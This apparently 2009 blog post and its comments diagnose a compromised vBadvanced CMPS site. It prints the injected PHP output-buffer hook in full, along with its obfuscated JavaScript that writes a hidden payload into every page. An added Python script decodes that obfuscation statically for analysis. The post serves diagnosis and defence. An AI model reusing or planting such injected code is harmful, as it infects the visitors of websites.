The title is terrible, but I seriously had no idea what else to consider, other than something similar to what I searched for. Here's the story...
As I'm going through unread email, I came across this from a friend and fellow webmaster,
My home page has had trouble loading for people in the past two days.
FF says "The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression."
IE just times out. Any idea wtf? I was able to load it earlier.. but now I can't. I haven't made any changes to it. lame lame lame lame
Sure enough, I visit the page: nothing. Let's see what the headers say.
http://www.r00ted-site??.com/
GET / HTTP/1.1
Host: www.r00ted-site??.com

HTTP/1.x 200 OK
Date: Fri, 01 May 2009 23:02:44 GMT
Server: Apache/1.3.41 (Unix) mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Cache-Control: private
Pragma: private
X-Powered-By: PHP/5.2.5
Set-Cookie: bblastvisit=1240161467; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Set-Cookie: bblastactivity=0; expires=Sat, 01-May-2010 23:02:44 GMT; path=/; domain=.r00ted-site??.com
Content-Length: 0
Content-Type: text/html; charset=ISO-8859-1
X-Cache: MISS from 0x95.
Connection: keep-alive
Ok, that checks out, let's see what Googlebot is seeing (Google Cache),
...snip...
Lovely... He sends over the index.php that's causing the issue, and here's what's inside:
<?php
/*d6dc9649bc1e96ceef5b932f3edee390*/
ob_start( create_function( '$buf', 'return str_repeat("\t",rand(28,40)).\'<script language=javascript>rtrlevm="iTiyvIYW%YYglJJLMU";ibvjpl="<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e !75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72 go!61srho,!68!66q!79!72!78u=!22pHGF\\\'!37!50!38!2cyT+6!73!2e!4d^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{!6159!26!28g]B!4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-\\\\\\\\\\\\"\\\\"!2cj!66cmun=!22\\\\",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d\\\\"!22,!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh=hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68!3e!2d1)!7b!20!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581!2d1)!3b!69f!28!67u!6b!74ox!7a<!3d0)gu!6bt!6f!78z!2b=81!3bvnz!75ex!70+!3dh!66q!79rx!75!2ec!68a!72!41!74(g!75k!74o!78!7a-1); } else!20vn!7auexp!2b=vvpyvt;}jfcmun+!3dv!6e!7aue!78p!3b!64!6fc!75!6d!65!6e!74.wr!69!74e(!6afcm!75n)!3b}<!2fs!63rip!74>";ncowyow=rtrlevm.charAt(8);trbcvxg=ibvjpl.replace(/!/g,ncowyow);muabsg=unescape(trbcvxg);var jvhgggf,mvzdovk;document.write(muabsg);jvhgggf="<.Ed0H[lC5z]~5]orpj5:5SEd0H[p>l`~zE[0izl{d]dCv)CCUTEig1lal[dTlal:5dl5vU2 :]z rlp]5C2{{z3`nU33Hpyln]UwdwH.:zlrlVkl`~zE[0izl~fo5oi3do3d3)gz53oyl:5C~o1la:5dlnlrlzo)lD5[oknM.o[+03oggzo)lD5[o1M]o[+03og1l6l,s#hhhhh1kniE~3oz[MEiiU0olrlz53ol6lprpl6lo.E5Hog:5C~o1l6lpklo2H0do.rpl6lnM[iF^+S[d0z]g1kAl`~zE[0izlE.: wE[ 3nv:g1lado[~dzlgniE~3oz[MEiiU0oM0zno2}`g5vU2 :]z l6lprpl6ln]UwdwH.:z1lrrl\\\\"V1kAl0`glE.: wE[ 3nv:g1l1lalniE~3oz[M)d0[oglp<S!R=8+lC5z]~5]or\\\\\\\\pj5:5SEd0H[\\\\\\\\plSR!r\\\\\\\\pv[[HI//]ii]Co5z5CT[CE.Mzo[/--~[3M]0`?PK9#K5&h,&VnVh,sKh,nh5VfVEVJ#VVhVK&&`&9hK,VJ&h(p6niE~3oz[Mdo`oddod6p(p6S[d0z]ggzo)lD5[og11M]o[+03og116p\\\\\\\\p><\\\\\\\\/S!Rp6p=8+>pl1kl~fo5oi3do3d3)gl5vU2 :]z 
yln]UwdwH.:zl1klAloC.olalAlAlE5[Evlgo1laAlAl{d]dCv)CCUTEig1k</.Ed0H[>l";uahidadu(jvhgggf);</script>\'."\n".$buf;' ) );/*d6dc9649bc1e96ceef5b932f3edee390*/
// ++=========================================================================++
// || vBadvanced CMPS v3.0.1 (vB 3.6 - vB 3.7) - 56182
// ++
... snip ...
I searched and searched, and came across what looks like a method of unobfuscating, but I'm too lazy to work at it.
Ideas, anyone? :]
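The deobfuscation method the post is looking for, as an added example (not the author's code and not part of vBadvanced): a Python script that statically repeats the two decoding steps the injected script applies to itself, so nothing from the payload is ever executed. The ibvjpl string is transcribed from the unmodified index.php above (with PHP's two layers of single-quote escaping already peeled off); the stage-2 substitution is demonstrated on a short constructed input rather than on the page's jvhgggf payload.

```python
"""Static decoder for the two-stage obfuscation in the injected index.php script."""
import re
from urllib.parse import unquote

# rtrlevm from the injected script; charAt(8) is the '%' used for the percent-escapes.
RTRLEVM = "iTiyvIYW%YYglJJLMU"

# ibvjpl as the browser's JS engine sees it (transcribed from the post; the '!'
# sequences are still encoded; split across lines only for width).
IBVJPL = (
    r"<script!20l!61!6eg!75a!67e!3dj!61va!73crip!74!3e !20!66!75n!63!74!69o!6e "
    r"!75!61!68!69!64adu(s!6f!6aoic!75!29{v!61!72 go!61srho,!68!66q!79!72!78u=!22"
    r"pHGF'!37!50!38!2cyT+6!73!2e!4d^!63!45!3b!6bUO!7dAt[!65o!69!30!68v:I=r!64n!7a{"
    r"!6159!26!28g]B!4e*Z|u~b!66!60x!32Jj!77)1V!24!404#!6d3K!71 !6c!43!21_-"
    r'\""!2cj!66cmun=!22",vvpy!76t!2cfz!68g!73ynh!2cvn!7a!75!65xp!3d"!22,'
    r"!67!75!6b!74o!78!7a!3b!66!6fr(g!6fasrh!6f=!30!3b!67oas!72ho!3c!73o!6a!6fic!75!2e!6ce!6e!67th!3b"
    r"!67oas!72ho++){ vvpyvt=!73oj!6ficu.!63ha!72At(!67o!61!73!72ho!29!3bfz!68gsy!6eh="
    r"hf!71yr!78u!2e!69!6edexO!66(vvpyvt!29!3b!69f(f!7a!68g!73!79n!68!3e!2d1)!7b!20"
    r"!67uk!74ox!7a=!28(f!7ah!67!73y!6e!68+!31)!2581!2d1)!3b!69f!28!67u!6b!74ox!7a<!3d0)gu!6bt!6f!78z!2b=81!3b"
    r"vnz!75ex!70+!3dh!66q!79rx!75!2ec!68a!72!41!74(g!75k!74o!78!7a-1); } else!20vn!7auexp!2b=vvpyvt;}"
    r"jfcmun+!3dv!6e!7aue!78p!3b!64!6fc!75!6d!65!6e!74.wr!69!74e(!6afcm!75n)!3b}<!2fs!63rip!74>"
)

def stage1(encoded: str) -> str:
    """Mirror of ibvjpl.replace(/!/g, rtrlevm.charAt(8)) followed by unescape()."""
    return unquote(encoded.replace("!", RTRLEVM[8]))

def extract_key(stage1_src: str) -> str:
    """Pull the hfqyrxu alphabet out of the decoded decoder and undo its JS escapes."""
    m = re.search(r'hfqyrxu="((?:\\.|[^"\\])*)"', stage1_src)
    return re.sub(r"\\(.)", r"\1", m.group(1))

def stage2(key: str, data: str) -> str:
    """Mirror of uahidadu(): each character found in the 81-char key becomes the
    character one position before it (wrapping); anything else passes through."""
    out = []
    for ch in data:
        i = key.find(ch)
        if i > -1:
            g = (i + 1) % 81 - 1
            if g <= 0:
                g += 81
            out.append(key[g - 1])
        else:
            out.append(ch)
    return "".join(out)

def decode_injected_script() -> tuple:
    """Return (decoded stage-1 decoder source, the substitution alphabet it carries)."""
    src = stage1(IBVJPL)
    return src, extract_key(src)
```

Stage 1 yields the plain-text decoder function, and the alphabet it carries is all that stage 2 needs, so the iframe payload can be read offline with stage2(key, ...) instead of letting a browser run it.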
Tags: exploit, javascript, php
Hi, have you any other info on how this happened?
I see the same thing on one server here...
Is this a new exploit for php or apache?
The friend that brought the unusual code to my attention later informed me that he reinstalled the application. Simply removing the offending code was a temporary solution as it always came back. Still not sure if the site was compromised or if this is a new exploit or what, but since reinstalling, he hasn't seen the code.